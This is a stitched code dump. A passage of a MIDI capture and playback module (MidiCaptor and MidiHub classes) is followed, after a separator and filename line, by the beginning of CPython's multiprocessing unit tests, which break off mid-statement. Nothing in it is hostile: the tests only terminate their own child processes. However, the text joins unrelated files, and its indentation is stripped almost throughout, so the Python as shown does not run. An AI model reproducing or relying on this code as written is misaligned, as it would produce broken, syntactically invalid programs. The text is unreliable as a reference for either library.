class PolyphonicMidiCaptor(MidiCaptor):
"""A MidiCaptor for polyphonic melodies."""
def __init__(self, *args, **kwargs):
# A dictionary of open NoteSequence.Note messages keyed by pitch.
self._open_notes = dict()
super(PolyphonicMidiCaptor, self).__init__(*args, **kwargs)
@concurrency.serialized
def _capture_message(self, msg):
"""Handles a single incoming MIDI message during capture.
Args:
msg: The mido.Message MIDI message to handle.
"""
if msg.type == 'note_off' or (msg.type == 'note_on' and msg.velocity == 0):
if msg.note not in self._open_notes:
# This is not a note we're looking for. Drop it.
return
self._open_notes[msg.note].end_time = msg.time
del self._open_notes[msg.note]
elif msg.type == 'note_on':
if msg.note in self._open_notes:
# This is likely just a repeat of the previous message.
return
new_note = self._add_note(msg)
self._open_notes[new_note.pitch] = new_note
class TextureType(object):
"""An Enum specifying the type of musical texture."""
MONOPHONIC = 1
POLYPHONIC = 2
class MidiHub(object):
"""A MIDI interface for capturing and playing NoteSequences.
Ignores/filters `program_change` messages. Assumes all messages are on the
same channel.
Args:
    input_midi_ports: A list of string MIDI port names or mido.ports.BaseInput
      objects to use for input. If a name is given that is not an available
      port, a virtual port will be opened with that name.
    output_midi_ports: A list of string MIDI port names or
      mido.ports.BaseOutput objects to use for output. If a name is given
      that is not an available port, a virtual port will be opened with that
      name.
texture_type: A TextureType Enum specifying the musical texture to assume
during capture, passthrough, and playback.
passthrough: A boolean specifying whether or not to pass incoming messages
through to the output, applying the appropriate texture rules.
playback_channel: The MIDI channel to send playback events.
playback_offset: The float time in seconds to adjust the playback event
times by.
"""
def __init__(self, input_midi_ports, output_midi_ports, texture_type,
passthrough=True, playback_channel=0, playback_offset=0.0):
self._texture_type = texture_type
self._passthrough = passthrough
self._playback_channel = playback_channel
self._playback_offset = playback_offset
# When `passthrough` is True, this is the set of open MIDI note pitches.
self._open_notes = set()
# This lock is used by the serialized decorator.
self._lock = threading.RLock()
# A dictionary mapping a compiled MidiSignal regex to a condition variable
    # that will be notified when a matching message is received.
self._signals = {}
# A dictionary mapping a compiled MidiSignal regex to a list of functions
# that will be called with the triggering message in individual threads when
# a matching message is received.
self._callbacks = collections.defaultdict(list)
# A dictionary mapping integer control numbers to most recently-received
# integer value.
self._control_values = {}
# Threads actively being used to capture incoming messages.
self._captors = []
# Potentially active player threads.
self._players = []
self._metronome = None
# Open MIDI ports.
if input_midi_ports:
for port in input_midi_ports:
if isinstance(port, mido.ports.BaseInput):
inport = port
else:
virtual = port not in get_available_input_ports()
if virtual:
tf.logging.info(
"Opening '%s' as a virtual MIDI port for input.", port)
inport = mido.open_input(port, virtual=virtual)
# Start processing incoming messages.
inport.callback = self._timestamp_and_handle_message
else:
tf.logging.warn('No input port specified. Capture disabled.')
self._inport = None
outports = []
for port in output_midi_ports:
      if isinstance(port, mido.ports.BaseOutput):
outports.append(port)
else:
virtual = port not in get_available_output_ports()
if virtual:
tf.logging.info(
"Opening '%s' as a virtual MIDI port for output.", port)
outports.append(mido.open_output(port, virtual=virtual))
self._outport = mido.ports.MultiPort(outports)
def __del__(self):
"""Stops all running threads and waits for them to terminate."""
for captor in self._captors:
captor.stop(block=False)
for player in self._players:
player.stop(block=False)
self.stop_metronome()
for captor in self._captors:
captor.join()
for player in self._players:
player.join()
@property
@concurrency.serialized
def passthrough(self):
return self._passthrough
@passthrough.setter
@concurrency.serialized
def passthrough(self, value):
"""Sets passthrough value, closing all open notes if being disabled."""
if self._passthrough == value:
return
# Close all open notes.
while self._open_notes:
self._outport.send(mido.Message('note_off', note=self._open_notes.pop()))
self._passthrough = value
def _timestamp_and_handle_message(self, msg):
"""Stamps message with current time and passes it to the handler."""
if msg.type == 'program_change':
return
if not msg.time:
msg.time = time.time()
self._handle_message(msg)
@concurrency.serialized
def _handle_message(self, msg):
"""Handles a single incoming MIDI message.
-If the message is being used as a signal, notifies threads waiting on the
appropriate condition variable.
-Adds the message to any capture queues.
-Passes the message through to the output port, if appropriate.
Args:
msg: The mido.Message MIDI message to handle.
"""
# Notify any threads waiting for this message.
msg_str = str(msg)
for regex in list(self._signals):
if regex.match(msg_str) is not None:
self._signals[regex].notify_all()
del self._signals[regex]
# Call any callbacks waiting for this message.
for regex in list(self._callbacks):
if regex.match(msg_str) is not None:
for fn in self._callbacks[regex]:
threading.Thread(target=fn, args=(msg,)).start()
del self._callbacks[regex]
# Remove any captors that are no longer alive.
self._captors[:] = [t for t in self._captors if t.is_alive()]
# Add a different copy of the message to the receive queue of each live
# capture thread.
for t in self._captors:
t.receive(msg.copy())
# Update control values if this is a control change message.
if msg.type == 'control_change':
if self._control_values.get(msg.control, None) != msg.value:
tf.logging.debug('Control change %d: %d', msg.control, msg.value)
self._control_values[msg.control] = msg.value
# Pass the message through to the output port, if appropriate.
if not self._passthrough:
pass
elif self._texture_type == TextureType.POLYPHONIC:
if msg.type == 'note_on' and msg.velocity > 0:
self._open_notes.add(msg.note)
elif (msg.type == 'note_off' or
(msg.type == 'note_on' and msg.velocity == 0)):
self._open_notes.discard(msg.note)
self._outport.send(msg)
elif self._texture_type == TextureType.MONOPHONIC:
assert len(self._open_notes) <= 1
if msg.type not in ['note_on', 'note_off']:
self._outport.send(msg)
elif ((msg.type == 'note_off' or
msg.type == 'note_on' and msg.velocity == 0) and
msg.note in self._open_notes):
self._outport.send(msg)
self._open_notes.remove(msg.note)
elif msg.type == 'note_on' and msg.velocity > 0:
if self._open_notes:
self._outport.send(
mido.Message('note_off', note=self._open_notes.pop()))
self._outport.send(msg)
self._open_notes.add(msg.note)
def start_capture(self, qpm, start_time, stop_time=None, stop_signal=None):
"""Starts a MidiCaptor to compile incoming messages into a NoteSequence.
    If neither `stop_time` nor `stop_signal` is provided, the caller must
explicitly stop the returned capture thread. If both are specified, the one
that occurs first will stop the capture.
Args:
qpm: The integer quarters per minute to use for the captured sequence.
start_time: The float wall time in seconds to start the capture. May be in
the past. Used for beat alignment.
stop_time: The optional float wall time in seconds to stop the capture.
      stop_signal: The optional mido.Message to use as a signal to stop
the capture.
Returns:
The MidiCaptor thread.
"""
if self._texture_type == TextureType.MONOPHONIC:
captor_class = MonophonicMidiCaptor
else:
captor_class = PolyphonicMidiCaptor
captor = captor_class(qpm, start_time, stop_time, stop_signal)
with self._lock:
self._captors.append(captor)
captor.start()
return captor
def capture_sequence(self, qpm, start_time, stop_time=None, stop_signal=None):
"""Compiles and returns incoming messages into a NoteSequence.
Blocks until capture stops. At least one of `stop_time` or `stop_signal`
must be specified. If both are specified, the one that occurs first will
stop the capture.
Args:
qpm: The integer quarters per minute to use for the captured sequence.
start_time: The float wall time in seconds to start the capture. May be in
the past. Used for beat alignment.
stop_time: The optional float wall time in seconds to stop the capture.
      stop_signal: The optional mido.Message to use as a signal to stop
the capture.
Returns:
The captured NoteSequence proto.
Raises:
MidiHubError: When neither `stop_time` nor `stop_signal` are provided.
"""
if stop_time is None and stop_signal is None:
raise MidiHubError(
'At least one of `stop_time` and `stop_signal` must be provided to '
'`capture_sequence` call.')
captor = self.start_capture(qpm, start_time, stop_time, stop_signal)
captor.join()
return captor.captured_sequence()
@concurrency.serialized
def wait_for_event(self, signal=None, timeout=None):
"""Blocks until a matching mido.Message arrives or the timeout occurs.
Exactly one of `signal` or `timeout` must be specified. Using a timeout
with a threading.Condition object causes additional delays when notified.
Args:
signal: A MidiSignal to use as a signal to stop waiting, or None.
timeout: A float timeout in seconds, or None.
Raises:
      MidiHubError: If neither or both of `signal` and `timeout` are specified.
"""
if (signal, timeout).count(None) != 1:
raise MidiHubError(
'Exactly one of `signal` or `timeout` must be provided to '
'`wait_for_event` call.')
if signal is None:
concurrency.Sleeper().sleep(timeout)
return
signal_pattern = str(signal)
    cond_var = None
    for regex, cv in self._signals.items():
      if regex.pattern == signal_pattern:
        cond_var = cv
        break
if cond_var is None:
cond_var = threading.Condition(self._lock)
self._signals[re.compile(signal_pattern)] = cond_var
cond_var.wait()
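  # Usage sketch (editor's illustration):
  # hub.wait_for_event(signal=MidiSignal(type='note_on')) blocks the
  # caller until any note_on message arrives on an input port.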
@concurrency.serialized
def wake_signal_waiters(self, signal=None):
"""Wakes all threads waiting on a signal event.
Args:
signal: The MidiSignal to wake threads waiting on, or None to wake all.
"""
for regex in list(self._signals):
if signal is None or regex.pattern == str(signal):
self._signals[regex].notify_all()
del self._signals[regex]
for captor in self._captors:
captor.wake_signal_waiters(signal)
@concurrency.serialized
def start_metronome(self, qpm, start_time, signals=None, channel=None):
"""Starts or updates the metronome with the given arguments.
Args:
qpm: The quarter notes per minute to use.
start_time: The wall time in seconds that the metronome is started on for
synchronization and beat alignment. May be in the past.
signals: An ordered collection of MidiSignals whose underlying messages
are to be output on the metronome's tick, cyclically. A None value can
be used in place of a MidiSignal to output nothing on a given tick.
channel: The MIDI channel to output ticks on.
"""
if self._metronome is not None and self._metronome.is_alive():
self._metronome.update(
qpm, start_time, signals=signals, channel=channel)
else:
self._metronome = Metronome(
self._outport, qpm, start_time, signals=signals, channel=channel)
self._metronome.start()
@concurrency.serialized
def stop_metronome(self, stop_time=0, block=True):
"""Stops the metronome at the given time if it is currently running.
Args:
stop_time: The float wall time in seconds after which the metronome should
stop. By default, stops at next tick.
block: If true, blocks until metronome is stopped.
"""
if self._metronome is None:
return
self._metronome.stop(stop_time, block)
self._metronome = None
def start_playback(self, sequence, start_time=time.time(),
allow_updates=False):
"""Plays the notes in aNoteSequence via the MIDI output port.
Args:
sequence: The NoteSequence to play, with times based on the wall clock.
start_time: The float time before which to strip events. Defaults to call
time. Events before this time will be sent immediately on start.
      allow_updates: A boolean specifying whether or not the player should
        allow the sequence to be updated and stay alive until `stop` is
        called.
Returns:
The MidiPlayer thread handling playback to enable updating.
"""
player = MidiPlayer(self._outport, sequence, start_time, allow_updates,
self._playback_channel, self._playback_offset)
with self._lock:
self._players.append(player)
player.start()
return player
@concurrency.serialized
def control_value(self, control_number):
"""Returns the most recently received value for the given control number.
Args:
control_number: The integer control number to return the value for, or
None.
Returns:
      The most recently received integer value for the given control number, or
None if no values have been received for that control.
"""
if control_number is None:
return None
return self._control_values.get(control_number)
def send_control_change(self, control_number, value):
"""Sends the specified control change message on the output port."""
self._outport.send(
mido.Message(
type='control_change',
control=control_number,
value=value))
@concurrency.serialized
def register_callback(self, fn, signal):
"""Calls `fn` at the next signal message.
The callback function must take exactly one argument, which will be the
message triggering the signal.
Survives until signal is called or the MidiHub is destroyed.
Args:
fn: The callback function to call, passing in the triggering message.
signal: A MidiSignal to use as a signal to call `fn` on the triggering
message.
"""
self._callbacks[re.compile(str(signal))].append(fn)
|
_test_multiprocessing.py
|
#
# Unit tests for the multiprocessing package
#
import unittest
import unittest.mock
import queue as pyqueue
import time
import io
import itertools
import sys
import os
import gc
import errno
import signal
import array
import socket
import random
import logging
import subprocess
import struct
import operator
import pickle
import weakref
import warnings
import test.support
import test.support.script_helper
from test import support
from test.support import hashlib_helper
from test.support import socket_helper
from test.support import threading_helper
# Skip tests if _multiprocessing wasn't built.
_multiprocessing = test.support.import_module('_multiprocessing')
# Skip tests if sem_open implementation is broken.
support.skip_if_broken_multiprocessing_synchronize()
import threading
import multiprocessing.connection
import multiprocessing.dummy
import multiprocessing.heap
import multiprocessing.managers
import multiprocessing.pool
import multiprocessing.queues
from multiprocessing import util
try:
from multiprocessing import reduction
HAS_REDUCTION = reduction.HAVE_SEND_HANDLE
except ImportError:
HAS_REDUCTION = False
try:
from multiprocessing.sharedctypes import Value, copy
HAS_SHAREDCTYPES = True
except ImportError:
HAS_SHAREDCTYPES = False
try:
from multiprocessing import shared_memory
HAS_SHMEM = True
except ImportError:
HAS_SHMEM = False
try:
import msvcrt
except ImportError:
msvcrt = None
def latin(s):
return s.encode('latin')
def close_queue(queue):
if isinstance(queue, multiprocessing.queues.Queue):
queue.close()
queue.join_thread()
def join_process(process):
    # Since multiprocessing.Process has the same API as threading.Thread
    # (join() and is_alive()), the support function can be reused
threading_helper.join_thread(process)
if os.name == "posix":
from multiprocessing import resource_tracker
def _resource_unlink(name, rtype):
resource_tracker._CLEANUP_FUNCS[rtype](name)
#
# Constants
#
LOG_LEVEL = util.SUBWARNING
#LOG_LEVEL = logging.DEBUG
DELTA = 0.1
CHECK_TIMINGS = False # making true makes tests take a lot longer
# and can sometimes cause some non-serious
# failures because some calls block a bit
# longer than expected
if CHECK_TIMINGS:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.82, 0.35, 1.4
else:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.1, 0.1, 0.1
HAVE_GETVALUE = not getattr(_multiprocessing,
'HAVE_BROKEN_SEM_GETVALUE', False)
WIN32 = (sys.platform == "win32")
from multiprocessing.connection import wait
def wait_for_handle(handle, timeout):
if timeout is not None and timeout < 0.0:
timeout = None
return wait([handle], timeout)
try:
MAXFD = os.sysconf("SC_OPEN_MAX")
except:
MAXFD = 256
# To speed up tests when using the forkserver, we can preload these:
PRELOAD = ['__main__', 'test.test_multiprocessing_forkserver']
#
# Some tests require ctypes
#
try:
from ctypes import Structure, c_int, c_double, c_longlong
except ImportError:
Structure = object
c_int = c_double = c_longlong = None
def check_enough_semaphores():
"""Check that the system supports enough semaphores to run the test."""
# minimum number of semaphores available according to POSIX
nsems_min = 256
try:
nsems = os.sysconf("SC_SEM_NSEMS_MAX")
except (AttributeError, ValueError):
# sysconf not available or setting not available
return
if nsems == -1 or nsems >= nsems_min:
return
raise unittest.SkipTest("The OS doesn't support enough semaphores "
"to run the test (required: %d)." % nsems_min)
#
# Creates a wrapper for a function which records the time it takes to finish
#
class TimingWrapper(object):
def __init__(self, func):
self.func = func
self.elapsed = None
def __call__(self, *args, **kwds):
t = time.monotonic()
try:
return self.func(*args, **kwds)
finally:
self.elapsed = time.monotonic() - t
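# e.g., t = TimingWrapper(time.sleep); t(0.2) returns after ~0.2s and
# leaves t.elapsed approximately equal to 0.2.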
#
# Base class for test cases
#
class BaseTestCase(object):
ALLOWED_TYPES = ('processes', 'manager', 'threads')
def assertTimingAlmostEqual(self, a, b):
if CHECK_TIMINGS:
self.assertAlmostEqual(a, b, 1)
def assertReturnsIfImplemented(self, value, func, *args):
try:
res = func(*args)
except NotImplementedError:
pass
else:
return self.assertEqual(value, res)
# For the sanity of Windows users, rather than crashing or freezing in
# multiple ways.
def __reduce__(self, *args):
raise NotImplementedError("shouldn't try to pickle a test case")
__reduce_ex__ = __reduce__
#
# Return the value of a semaphore
#
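# Note (editor's): despite the shared name, `self` below is a
# semaphore-like object, so `self.get_value()` invokes the object's own
# method rather than recursing into this helper.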
def get_value(self):
try:
return self.get_value()
except AttributeError:
try:
return self._Semaphore__value
except AttributeError:
try:
return self._value
except AttributeError:
raise NotImplementedError
#
# Testcases
#
class DummyCallable:
def __call__(self, q, c):
assert isinstance(c, DummyCallable)
q.put(5)
class _TestProcess(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def test_current(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
current = self.current_process()
authkey = current.authkey
self.assertTrue(current.is_alive())
self.assertTrue(not current.daemon)
self.assertIsInstance(authkey, bytes)
self.assertTrue(len(authkey) > 0)
self.assertEqual(current.ident, os.getpid())
self.assertEqual(current.exitcode, None)
def test_daemon_argument(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# By default uses the current process's daemon flag.
proc0 = self.Process(target=self._test)
self.assertEqual(proc0.daemon, self.current_process().daemon)
proc1 = self.Process(target=self._test, daemon=True)
self.assertTrue(proc1.daemon)
proc2 = self.Process(target=self._test, daemon=False)
self.assertFalse(proc2.daemon)
@classmethod
def _test(cls, q, *args, **kwds):
current = cls.current_process()
q.put(args)
q.put(kwds)
q.put(current.name)
if cls.TYPE != 'threads':
q.put(bytes(current.authkey))
q.put(current.pid)
def test_parent_process_attributes(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
self.assertIsNone(self.parent_process())
rconn, wconn = self.Pipe(duplex=False)
p = self.Process(target=self._test_send_parent_process, args=(wconn,))
p.start()
p.join()
parent_pid, parent_name = rconn.recv()
self.assertEqual(parent_pid, self.current_process().pid)
self.assertEqual(parent_pid, os.getpid())
self.assertEqual(parent_name, self.current_process().name)
@classmethod
def _test_send_parent_process(cls, wconn):
from multiprocessing.process import parent_process
wconn.send([parent_process().pid, parent_process().name])
def test_parent_process(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# Launch a child process. Make it launch a grandchild process. Kill the
# child process and make sure that the grandchild notices the death of
# its parent (a.k.a the child process).
rconn, wconn = self.Pipe(duplex=False)
p = self.Process(
target=self._test_create_grandchild_process, args=(wconn, ))
p.start()
if not rconn.poll(timeout=support.LONG_TIMEOUT):
raise AssertionError("Could not communicate with child process")
parent_process_status = rconn.recv()
self.assertEqual(parent_process_status, "alive")
p.terminate()
p.join()
if not rconn.poll(timeout=support.LONG_TIMEOUT):
raise AssertionError("Could not communicate with child process")
parent_process_status = rconn.recv()
self.assertEqual(parent_process_status, "not alive")
@classmethod
def _test_create_grandchild_process(cls, wconn):
p = cls.Process(target=cls._test_report_parent_status, args=(wconn, ))
p.start()
time.sleep(300)
@classmethod
def _test_report_parent_status(cls, wconn):
from multiprocessing.process import parent_process
wconn.send("alive" if parent_process().is_alive() else "not alive")
parent_process().join(timeout=support.SHORT_TIMEOUT)
wconn.send("alive" if parent_process().is_alive() else "not alive")
def test_process(self):
q = self.Queue(1)
e = self.Event()
args = (q, 1, 2)
kwargs = {'hello':23, 'bye':2.54}
name = 'SomeProcess'
p = self.Process(
target=self._test, args=args, kwargs=kwargs, name=name
)
p.daemon = True
current = self.current_process()
if self.TYPE != 'threads':
self.assertEqual(p.authkey, current.authkey)
self.assertEqual(p.is_alive(), False)
self.assertEqual(p.daemon, True)
self.assertNotIn(p, self.active_children())
self.assertTrue(type(self.active_children()) is list)
self.assertEqual(p.exitcode, None)
p.start()
self.assertEqual(p.exitcode, None)
self.assertEqual(p.is_alive(), True)
self.assertIn(p, self.active_children())
self.assertEqual(q.get(), args[1:])
self.assertEqual(q.get(), kwargs)
self.assertEqual(q.get(), p.name)
if self.TYPE != 'threads':
self.assertEqual(q.get(), current.authkey)
self.assertEqual(q.get(), p.pid)
p.join()
self.assertEqual(p.exitcode, 0)
self.assertEqual(p.is_alive(), False)
self.assertNotIn(p, self.active_children())
close_queue(q)
@unittest.skipUnless(threading._HAVE_THREAD_NATIVE_ID, "needs native_id")
def test_process_mainthread_native_id(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
current_mainthread_native_id = threading.main_thread().native_id
q = self.Queue(1)
p = self.Process(target=self._test_process_mainthread_native_id, args=(q,))
p.start()
child_mainthread_native_id = q.get()
p.join()
close_queue(q)
self.assertNotEqual(current_mainthread_native_id, child_mainthread_native_id)
@classmethod
def _test_process_mainthread_native_id(cls, q):
mainthread_native_id = threading.main_thread().native_id
q.put(mainthread_native_id)
@classmethod
def _sleep_some(cls):
time.sleep(100)
@classmethod
def _test_sleep(cls, delay):
time.sleep(delay)
def _kill_process(self, meth):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
p = self.Process(target=self._sleep_some)
p.daemon = True
p.start()
self.assertEqual(p.is_alive(), True)
self.assertIn(p, self.active_children())
self.assertEqual(p.exitcode, None)
join = TimingWrapper(p.join)
self.assertEqual(join(0), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), True)
self.assertEqual(join(-1), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), True)
# XXX maybe terminating too soon causes the problems on Gentoo...
time.sleep(1)
meth(p)
if hasattr(signal, 'alarm'):
# On the Gentoo buildbot waitpid() often seems to block forever.
# We use alarm() to interrupt it if it blocks for too long.
def handler(*args):
raise RuntimeError('join took too long: %s' % p)
old_handler = signal.signal(signal.SIGALRM, handler)
try:
signal.alarm(10)
self.assertEqual(join(), None)
finally:
signal.alarm(0)
signal.signal(signal.SIGALRM, old_handler)
else:
self.assertEqual(join(), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), False)
self.assertNotIn(p, self.active_children())
p.join()
return p.exitcode
def test_terminate(self):
exitcode = self._kill_process(multiprocessing.Process.terminate)
if os.name != 'nt':
self.assertEqual(exitcode, -signal.SIGTERM)
def test_kill(self):
exitcode = self._kill_process(multiprocessing.Process.kill)
if os.name != 'nt':
self.assertEqual(exitcode, -signal.SIGKILL)
def test_cpu_count(self):
try:
cpus = multiprocessing.cpu_count()
except NotImplementedError:
cpus = 1
self.assertTrue(type(cpus) is int)
self.assertTrue(cpus >= 1)
def test_active_children(self):
self.assertEqual(type(self.active_children()), list)
p = self.Process(target=time.sleep, args=(DELTA,))
self.assertNotIn(p, self.active_children())
p.daemon = True
p.start()
self.assertIn(p, self.active_children())
p.join()
self.assertNotIn(p, self.active_children())
@classmethod
def _test_recursion(cls, wconn, id):
wconn.send(id)
if len(id) < 2:
for i in range(2):
p = cls.Process(
target=cls._test_recursion, args=(wconn, id+[i])
)
p.start()
p.join()
def test_recursion(self):
rconn, wconn = self.Pipe(duplex=False)
self._test_recursion(wconn, [])
time.sleep(DELTA)
result = []
while rconn.poll():
result.append(rconn.recv())
expected = [
[],
[0],
[0, 0],
[0, 1],
[1],
[1, 0],
[1, 1]
]
self.assertEqual(result, expected)
@classmethod
def _test_sentinel(cls, event):
event.wait(10.0)
def test_sentinel(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
event = self.Event()
p = self.Process(target=self._test_sentinel, args=(event,))
with self.assertRaises(ValueError):
p.sentinel
p.start()
self.addCleanup(p.join)
sentinel = p.sentinel
self.assertIsInstance(sentinel, int)
self.assertFalse(wait_for_handle(sentinel, timeout=0.0))
event.set()
p.join()
self.assertTrue(wait_for_handle(sentinel, timeout=1))
@classmethod
def _test_close(cls, rc=0, q=None):
if q is not None:
q.get()
sys.exit(rc)
def test_close(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
q = self.Queue()
p = self.Process(target=self._test_close, kwargs={'q': q})
p.daemon = True
p.start()
self.assertEqual(p.is_alive(), True)
# Child is still alive, cannot close
with self.assertRaises(ValueError):
p.close()
q.put(None)
p.join()
self.assertEqual(p.is_alive(), False)
self.assertEqual(p.exitcode, 0)
p.close()
with self.assertRaises(ValueError):
p.is_alive()
with self.assertRaises(ValueError):
p.join()
with self.assertRaises(ValueError):
p.terminate()
p.close()
wr = weakref.ref(p)
del p
gc.collect()
self.assertIs(wr(), None)
close_queue(q)
def test_many_processes(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
N = 5 if sm == 'spawn' else 100
# Try to overwhelm the forkserver loop with events
procs = [self.Process(target=self._test_sleep, args=(0.01,))
for i in range(N)]
for p in procs:
p.start()
for p in procs:
join_process(p)
for p in procs:
self.assertEqual(p.exitcode, 0)
procs = [self.Process(target=self._sleep_some)
for i in range(N)]
for p in procs:
p.start()
time.sleep(0.001) # let the children start...
for p in procs:
p.terminate()
for p in procs:
join_process(p)
if os.name != 'nt':
exitcodes = [-signal.SIGTERM]
if sys.platform == 'darwin':
# bpo-31510: On macOS, killing a freshly started process with
# SIGTERM sometimes kills the process with SIGKILL.
exitcodes.append(-signal.SIGKILL)
for p in procs:
self.assertIn(p.exitcode, exitcodes)
def test_lose_target_ref(self):
c = DummyCallable()
wr = weakref.ref(c)
q = self.Queue()
p = self.Process(target=c, args=(q, c))
del c
p.start()
p.join()
self.assertIs(wr(), None)
self.assertEqual(q.get(), 5)
close_queue(q)
@classmethod
    def _test_child_fd_inflation(cls, evt, q):
q.put(test.support.fd_count())
evt.wait()
def test_child_fd_inflation(self):
# Number of fds in child processes should not grow with the
# number of running children.
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
if sm == 'fork':
# The fork method by design inherits all fds from the parent,
# trying to go against it is a lost battle
self.skipTest('test not appropriate for {}'.format(sm))
N = 5
evt = self.Event()
q = self.Queue()
procs = [self.Process(target=self._test_child_fd_inflation, args=(evt, q))
for i in range(N)]
for p in procs:
p.start()
try:
fd_counts = [q.get() for i in range(N)]
self.assertEqual(len(set(fd_counts)), 1, fd_counts)
finally:
evt.set()
for p in procs:
p.join()
close_queue(q)
@classmethod
    def _test_wait_for_threads(cls, evt):
def func1():
time.sleep(0.5)
evt.set()
def func2():
time.sleep(20)
evt.clear()
threading.Thread(target=func1).start()
threading.Thread(target=func2, daemon=True).start()
def test_wait_for_threads(self):
# A child process should wait for non-daemonic threads to end
# before exiting
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
evt = self.Event()
proc = self.Process(target=self._test_wait_for_threads, args=(evt,))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
@classmethod
    def _test_error_on_stdio_flush(cls, evt, break_std_streams={}):
for stream_name, action in break_std_streams.items():
if action == 'close':
stream = io.StringIO()
stream.close()
else:
assert action == 'remove'
stream = None
            setattr(sys, stream_name, stream)
evt.set()
def test_error_on_stdio_flush_1(self):
# Check that Process works with broken standard streams
streams = [io.StringIO(), None]
streams[0].close()
for stream_name in ('stdout', 'stderr'):
for stream in streams:
old_stream = getattr(sys, stream_name)
setattr(sys, stream_name, stream)
try:
evt = self.Event()
proc = self.Process(target=self._test_error_on_stdio_flush,
args=(evt,))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
self.assertEqual(proc.exitcode, 0)
finally:
setattr(sys, stream_name, old_stream)
def test_error_on_stdio_flush_2(self):
# Same as test_error_on_stdio_flush_1(), but standard streams are
# broken by the child process
for stream_name in ('stdout', 'stderr'):
for action in ('close', 'remove'):
old_stream = getattr(sys, stream_name)
try:
evt = self.Event()
proc = self.Process(target=self._test_error_on_stdio_flush,
args=(evt, {stream_name: action}))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
self.assertEqual(proc.exitcode, 0)
finally:
setattr(sys, stream_name, old_stream)
@classmethod
    def _sleep_and_set_event(cls, evt, delay=0.0):
time.sleep(delay)
evt.set()
def check_forkserver_death(self, signum):
# bpo-31308: if the forkserver process has died, we should still
# be able to create and run new Process instances (the forkserver
# is implicitly restarted).
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
if sm != 'forkserver':
            # This test exercises the forkserver implementation, so skip
            # the other start methods.
self.skipTest('test not appropriate for {}'.format(sm))
from multiprocessing.forkserver import _forkserver
_forkserver.ensure_running()
# First process sleeps 500 ms
delay = 0.5
evt = self.Event()
proc = self.Process(target=self._sleep_and_set_event, args=(evt, delay))
proc.start()
pid = _forkserver._forkserver_pid
os.kill(pid, signum)
# give time to the fork server to die and time to proc to complete
time.sleep(delay * 2.0)
evt2 = self.Event()
proc2 = self.Process(target=self._sleep_and_set_event, args=(evt2,))
proc2.start()
proc2.join()
self.assertTrue(evt2.is_set())
self.assertEqual(proc2.exitcode, 0)
proc.join()
self.assertTrue(evt.is_set())
self.assertIn(proc.exitcode, (0, 255))
def test_forkserver_sigint(self):
# Catchable signal
self.check_forkserver_death(signal.SIGINT)
def test_forkserver_sigkill(self):
# Uncatchable signal
if os.name != 'nt':
self.check_forkserver_death(signal.SIGKILL)
#
#
#
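# Helper for _TestSubclassingProcess below: a Process subclass that owns
# both ends of a pipe, echoes back an upper-cased copy of each string it
# receives, and stops once it reads the None sentinel.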
class _UpperCaser(multiprocessing.Process):
def __init__(self):
multiprocessing.Process.__init__(self)
self.child_conn, self.parent_conn = multiprocessing.Pipe()
def run(self):
self.parent_conn.close()
for s in iter(self.child_conn.recv, None):
self.child_conn.send(s.upper())
self.child_conn.close()
def submit(self, s):
assert type(s) is str
self.parent_conn.send(s)
return self.parent_conn.recv()
def stop(self):
self.parent_conn.send(None)
self.parent_conn.close()
self.child_conn.close()
class _TestSubclassingProcess(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_subclassing(self):
uppercaser = _UpperCaser()
uppercaser.daemon = True
uppercaser.start()
self.assertEqual(uppercaser.submit('hello'), 'HELLO')
self.assertEqual(uppercaser.submit('world'), 'WORLD')
uppercaser.stop()
uppercaser.join()
def test_stderr_flush(self):
# sys.stderr is flushed at process shutdown (issue #13812)
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
testfn = test.support.TESTFN
self.addCleanup(test.support.unlink, testfn)
proc = self.Process(target=self._test_stderr_flush, args=(testfn,))
proc.start()
proc.join()
with open(testfn, 'r') as f:
err = f.read()
# The whole traceback was printed
self.assertIn("ZeroDivisionError", err)
self.assertIn("test_multiprocessing.py", err)
self.assertIn("1/0 # MARKER", err)
@classmethod
def _test_stderr_flush(cls, testfn):
fd = os.open(testfn, os.O_WRONLY | os.O_CREAT | os.O_EXCL)
sys.stderr = open(fd, 'w', closefd=False)
1/0 # MARKER
@classmethod
def _test_sys_exit(cls, reason, testfn):
fd = os.open(testfn, os.O_WRONLY | os.O_CREAT | os.O_EXCL)
sys.stderr = open(fd, 'w', closefd=False)
sys.exit(reason)
def test_sys_exit(self):
# See Issue 13854
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
testfn = test.support.TESTFN
self.addCleanup(test.support.unlink, testfn)
for reason in (
[1, 2, 3],
'ignore this',
):
p = self.Process(target=self._test_sys_exit, args=(reason, testfn))
p.daemon = True
p.start()
join_process(p)
self.assertEqual(p.exitcode, 1)
with open(testfn, 'r') as f:
content = f.read()
self.assertEqual(content.rstrip(), str(reason))
os.unlink(testfn)
cases = [
